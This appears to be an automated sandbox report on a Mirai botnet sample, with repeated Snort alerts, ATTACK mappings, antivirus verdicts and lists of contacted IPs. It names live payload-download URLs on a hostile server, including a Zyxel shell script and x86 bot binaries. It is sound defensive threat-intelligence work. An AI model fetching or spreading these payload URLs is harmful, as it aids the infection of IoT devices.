Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)

Yara detected Mirai

Source: Yara match

File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	Direct Volume Access	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	11 Non-Standard Port	Exfiltration Over Other Network Medium	1 Service Stop
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Source	Detection	Scanner	Label	Link
E6l0C6FObI.elf	66%	ReversingLabs	Linux.Trojan.Mirai
E6l0C6FObI.elf	66%	Virustotal		Browse
E6l0C6FObI.elf	100%	Avira	EXP/ELF.Mirai.Bootnet.Gen.o

Source	Detection	Scanner	Label	Link
http://141.98.10.72/zyxel.sh;	0%	Avira URL Cloud	safe
http://141.98.10.72/bins/x86	0%	Avira URL Cloud	safe
http://192.168.0.14:80/cgi-bin/ViewLog.asp	0%	Avira URL Cloud	safe
http://192.168.0.14:80/cgi-bin/ViewLog.asp	1%	Virustotal		Browse
http://141.98.10.72/zyxel.sh;	4%	Virustotal		Browse

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
daisy.ubuntu.com	162.213.35.25	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://192.168.0.14:80/cgi-bin/ViewLog.asp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://141.98.10.72/bins/x86	E6l0C6FObI.elf	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	E6l0C6FObI.elf	false		high
http://141.98.10.72/zyxel.sh;	E6l0C6FObI.elf	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	E6l0C6FObI.elf	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
41.102.150.105	unknown	Algeria	36947	ALGTEL-ASDZ	false
198.227.165.27	unknown	United States	18933	USCC-MPLS01US	false
182.250.3.206	unknown	Japan	2516	KDDIKDDICORPORATIONJP	false
216.241.195.232	unknown	United States	26253	SCINTERNETUS	false
41.145.154.98	unknown	South Africa	5713	SAIX-NETZA	false
62.131.13.104	unknown	Netherlands	1136	KPNKPNNationalEU	false
27.49.160.253	unknown	India	23772	ORTELNET-ASMsOrtelCommunicationsLtdIN	false
197.217.101.154	unknown	Angola	11259	ANGOLATELECOMAO	false
85.52.91.115	unknown	Spain	12479	UNI2-ASES	false
62.188.186.104	unknown	United Kingdom	702	UUNETUS	false
31.100.145.10	unknown	United Kingdom	12576	EELtdGB	false
104.19.99.1	unknown	United States	13335	CLOUDFLARENETUS	false
95.64.90.78	unknown	Iran (ISLAMIC Republic Of)	197207	MCCI-ASIR	false
85.48.206.179	unknown	Spain	12479	UNI2-ASES	false
85.252.4.4	unknown	Norway	2116	ASN-CATCHCOMNO	false
62.176.105.183	unknown	Bulgaria	8866	BTC-ASBULGARIABG	false
197.33.61.38	unknown	Egypt	8452	TE-ASTE-ASEG	false
85.251.57.33	unknown	Spain	12357	COMUNITELSPAINES	false
85.202.224.218	unknown	Russian Federation	44622	MTK-MOSINTER-ASRU	false
8.96.5.40	unknown	United States	3356	LEVEL3US	false
144.82.164.13	unknown	United Kingdom	786	JANETJiscServicesLimitedGB	false
85.218.82.218	unknown	Switzerland	34781	SIL-CITYCABLE-ASCH	false
95.215.48.31	unknown	Ukraine	48882	OPTIMA-SHID-ASUA	false
85.4.129.144	unknown	Switzerland	3303	SWISSCOMSwisscomSwitzerlandLtdCH	false
95.115.114.47	unknown	Germany	6805	TDDE-ASN1DE	false
95.134.40.5	unknown	Ukraine	6849	UKRTELNETUA	false
156.134.164.83	unknown	United States	27174	UNASSIGNED	false
95.190.77.84	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
95.115.114.49	unknown	Germany	6805	TDDE-ASN1DE	false
62.150.245.4	unknown	Kuwait	9155	QNETKuwaitKW	false
197.74.193.249	unknown	South Africa	16637	MTNNS-ASZA	false
191.50.194.222	unknown	Brazil	26615	TIMSABR	false
94.107.201.110	unknown	Belgium	47377	ORANGE_BELGIUM_SAKPNBelgiumBusinessNVhasbeenacquired	false
94.85.218.70	unknown	Italy	3269	ASN-IBSNAZIT	false
94.142.35.142	unknown	Jordan	48832	ZAIN-JO	false
85.90.80.70	unknown	Netherlands	1126	VANCISVancisAdvancedICTServicesEU	false
85.90.80.72	unknown	Netherlands	1126	VANCISVancisAdvancedICTServicesEU	false
197.234.167.167	unknown	South Africa	37315	CipherWaveZA	false
197.75.183.144	unknown	South Africa	16637	MTNNS-ASZA	false
83.191.157.209	unknown	Sweden	39651	COMHEM-SWEDENSE	false
31.210.213.36	unknown	Russian Federation	43727	KVANT-TELECOMRU	false
95.170.75.140	unknown	Netherlands	20857	TRANSIP-ASAmsterdamtheNetherlandsNL	false
85.84.200.56	unknown	Spain	12338	EUSKALTELES	false
94.224.166.177	unknown	Belgium	6848	TELENET-ASBE	false
94.116.117.161	unknown	United Kingdom	41012	THECLOUDGB	false
31.247.60.236	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
62.28.37.205	unknown	Portugal	15525	MEO-EMPRESASPT	false
94.116.117.157	unknown	United Kingdom	41012	THECLOUDGB	false
62.242.237.30	unknown	Denmark	3292	TDCTDCASDK	false
94.25.52.18	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
94.65.166.79	unknown	Greece	6799	OTENET-GRAthens-GreeceGR	false
95.24.169.244	unknown	Russian Federation	8402	CORBINA-ASOJSCVimpelcomRU	false
94.51.254.179	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
140.230.5.35	unknown	Canada	8111	DALUNIVCA	false
146.132.148.35	unknown	United States	10695	WAL-MARTUS	false
112.236.19.0	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
41.17.0.115	unknown	South Africa	29975	VODACOM-ZA	false
74.29.89.205	unknown	United States	7922	COMCAST-7922US	false
92.243.46.29	unknown	Austria	44385	NA-NET-ASAT	false
94.35.125.232	unknown	Italy	8612	TISCALI-IT	false
4.74.199.233	unknown	United States	3356	LEVEL3US	false
62.39.174.139	unknown	France	15557	LDCOMNETFR	false
197.44.77.144	unknown	Egypt	8452	TE-ASTE-ASEG	false
169.160.238.188	unknown	United States	37611	AfrihostZA	false
58.203.24.141	unknown	China	4538	ERX-CERNET-BKBChinaEducationandResearchNetworkCenter	false
85.83.182.158	unknown	Denmark	9158	TELENOR_DANMARK_ASDK	false
94.243.32.248	unknown	Russian Federation	48212	MKS-CHITA-ASRU	false
95.110.130.128	unknown	Italy	31034	ARUBA-ASNIT	false
62.42.192.168	unknown	Spain	6739	ONO-ASCableuropa-ONOES	false
95.118.119.233	unknown	Germany	6805	TDDE-ASN1DE	false
94.159.123.216	unknown	Russian Federation	49531	NETCOM-R-ASRU	false
41.203.88.51	unknown	Nigeria	37148	globacom-asNG	false
88.110.161.209	unknown	United Kingdom	9105	TISCALI-UKTalkTalkCommunicationsLimitedGB	false
95.54.216.162	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
185.198.14.154	unknown	unknown	200719	MISSDOMAINSE	false
38.155.239.35	unknown	United States	174	COGENT-174US	false
62.60.239.55	unknown	Iran (ISLAMIC Republic Of)	18013	ASLINE-AS-APASLINELIMITEDHK	false
95.94.139.49	unknown	Portugal	2860	NOS_COMUNICACOESPT	false
50.183.31.250	unknown	United States	7922	COMCAST-7922US	false
85.130.122.0	unknown	Bulgaria	13124	IBGCBG	false
95.207.192.92	unknown	Sweden	3301	TELIANET-SWEDENTeliaCompanySE	false
195.113.145.138	unknown	Czech Republic	2852	CESNET2CZ	false
165.183.247.56	unknown	Chile	52226	CODELCOChuquicamataCL	false
94.70.94.71	unknown	Greece	6799	OTENET-GRAthens-GreeceGR	false
197.16.236.52	unknown	Tunisia	37693	TUNISIANATN	false
94.130.40.222	unknown	Germany	24940	HETZNER-ASDE	false
95.71.223.53	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
197.82.0.25	unknown	South Africa	10474	OPTINETZA	false
62.137.17.223	unknown	United Kingdom	12337	NORIS-NETWORKITServiceProviderlocatedinNuernbergGerm	false
62.60.239.64	unknown	Iran (ISLAMIC Republic Of)	18013	ASLINE-AS-APASLINELIMITEDHK	false
31.63.4.111	unknown	Poland	5617	TPNETPL	false
219.39.78.9	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
112.93.142.244	unknown	China	17816	CHINA169-GZChinaUnicomIPnetworkChina169Guangdongprovi	false
62.215.172.34	unknown	Kuwait	21050	FAST-TELCOKW	false
209.177.36.122	unknown	United States	7029	WINDSTREAMUS	false
31.61.47.21	unknown	Poland	5617	TPNETPL	false
85.230.216.19	unknown	Sweden	2119	TELENOR-NEXTELTelenorNorgeASNO	false
197.167.97.241	unknown	Egypt	24863	LINKdotNET-ASEG	false
31.163.227.52	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
197.195.100.223	unknown	Egypt	36992	ETISALAT-MISREG	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
41.102.150.105	2BGPH1Q6mL.elf	Get hash	malicious	Mirai	Browse
	ak.mpsl-20220923-2311.elf	Get hash	malicious	Mirai	Browse
	arm7	Get hash	malicious	Mirai	Browse
104.19.99.1	EzR25X70H0.elf	Get hash	malicious	Mirai	Browse
41.145.154.98	j26wE6tjwL.elf	Get hash	malicious	Mirai, Moobot	Browse
	x86	Get hash	malicious	Mirai	Browse
	U1R7Ed7940	Get hash	malicious	Mirai	Browse
62.131.13.104	9IDtyIo5ME	Get hash	malicious	Unknown	Browse
	Mercury.mips	Get hash	malicious	Mirai	Browse
	iy4DmDjSNM	Get hash	malicious	Mirai	Browse
197.217.101.154	x86.elf	Get hash	malicious	Mirai	Browse
	bok.mips-20230316-1118.elf	Get hash	malicious	Mirai	Browse
	x86-20220414-1450	Get hash	malicious	Mirai	Browse
	2UFDZwqcvk	Get hash	malicious	Mirai	Browse
85.52.91.115	810gMVdxHV	Get hash	malicious	Mirai	Browse
	o1xIPzPjOt	Get hash	malicious	Mirai	Browse
	IU65U1j0PR	Get hash	malicious	Mirai	Browse
62.188.186.104	pfbZRXBuZY.elf	Get hash	malicious	Mirai	Browse
	7xt7YvcLod.elf	Get hash	malicious	Mirai	Browse
	8Ech14hLDd	Get hash	malicious	Mirai	Browse
31.100.145.10	6vh25lHbJ5	Get hash	malicious	Mirai	Browse
31.100.145.10	wRdL20qd2B	Get hash	malicious	Mirai	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
daisy.ubuntu.com	PWFSinkTUC.elf	Get hash	malicious	Mirai	Browse	162.213.35.24
	PkW6iwNjSa.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
	pTl791h3wF.elf	Get hash	malicious	Mirai	Browse	162.213.35.25
	F13Qfddhfp.elf	Get hash	malicious	Mirai	Browse	162.213.35.24
	Omkyhy25l0.elf	Get hash	malicious	Mirai	Browse	162.213.35.24
	HyiB1ddIMa.elf	Get hash	malicious	Mirai	Browse	162.213.35.25
	prkdxMl4PN.elf	Get hash	malicious	Mirai	Browse	162.213.35.24
	lGeRX8rqsG.elf	Get hash	malicious	Mirai	Browse	162.213.35.25
	sora.arm7.elf	Get hash	malicious	Mirai	Browse	162.213.35.25
	sora.x86.elf	Get hash	malicious	Mirai	Browse	162.213.35.24

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SAIX-NETZA	PWFSinkTUC.elf	Get hash	malicious	Mirai	Browse	41.150.142.19
	Omkyhy25l0.elf	Get hash	malicious	Mirai	Browse	165.144.202.195
	lGeRX8rqsG.elf	Get hash	malicious	Mirai	Browse	103.250.206.26
	mips-20240214-0633.elf	Get hash	malicious	Mirai, Moobot	Browse	41.146.145.214
	arm.elf	Get hash	malicious	Mirai, Moobot	Browse	41.145.95.33
	NOz0E5iqkk.elf	Get hash	malicious	Mirai	Browse	165.144.202.190
	nVpjppX9az.elf	Get hash	malicious	Unknown	Browse	102.250.132.37
	JYBkeTI3xc.elf	Get hash	malicious	Mirai	Browse	41.145.58.89
